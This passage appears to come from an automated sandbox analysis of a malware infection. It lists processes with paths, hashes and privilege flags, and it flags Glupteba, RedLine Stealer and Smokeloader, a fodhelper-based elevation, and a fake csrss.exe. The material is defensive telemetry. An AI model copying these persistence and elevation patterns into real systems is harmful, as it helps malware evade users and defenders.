File size:	49'664 bytes
MD5 hash:	85018BE1FD913656BC9FF541F017EACD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	21:12:42
Start date:	22/12/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	36
Start time:	21:12:43
Start date:	22/12/2023
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff732070000
File size:	49'664 bytes
MD5 hash:	85018BE1FD913656BC9FF541F017EACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	37
Start time:	21:12:43
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\4E3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4E3.exe"
Imagebase:	0x400000
File size:	4'479'880 bytes
MD5 hash:	5DAC05753690AC45C4020CCE37B861FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000025.00000002.2220222962.0000000000843000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000025.00000002.2228451591.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000025.00000002.2228180435.0000000002B72000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000025.00000003.2173646781.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000025.00000002.2228451591.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	38
Start time:	21:12:44
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\1DCB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1DCB.exe
Imagebase:	0x400000
File size:	7'599'903 bytes
MD5 hash:	715ADBD8EC5CA2067CA7CC665E68E789
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	39
Start time:	21:12:44
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp" /SL5="$E0426,7353157,54272,C:\Users\user\AppData\Local\Temp\1DCB.exe"
Imagebase:	0x400000
File size:	704'512 bytes
MD5 hash:	A7662827ECAEB4FC68334F6B8791B917
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Has exited:	false

Target ID:	40
Start time:	21:12:45
Start date:	22/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -nologo -noprofile
Imagebase:	0xfc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Target ID:	41
Start time:	21:12:45
Start date:	22/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	42
Start time:	21:12:45
Start date:	22/12/2023
Path:	C:\Windows\System32\consent.exe
Wow64 process (32bit):	false
Commandline:	consent.exe 5704 448 0000021C6C8372A0
Imagebase:	0x7ff70e7e0000
File size:	186'704 bytes
MD5 hash:	DD5032EF160209E470E2612A8A3D5F59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	21:12:45
Start date:	22/12/2023
Path:	C:\ProgramData\Drivers\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Drivers\csrss.exe"
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.2209552355.0000000005600000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Target ID:	44
Start time:	21:12:46
Start date:	22/12/2023
Path:	C:\Users\user\AppData\Local\Temp\1DCB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1DCB.exe" /SPAWNWND=$A031E /NOTIFYWND=$E0426
Imagebase:	0x400000
File size:	7'599'903 bytes
MD5 hash:	715ADBD8EC5CA2067CA7CC665E68E789
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false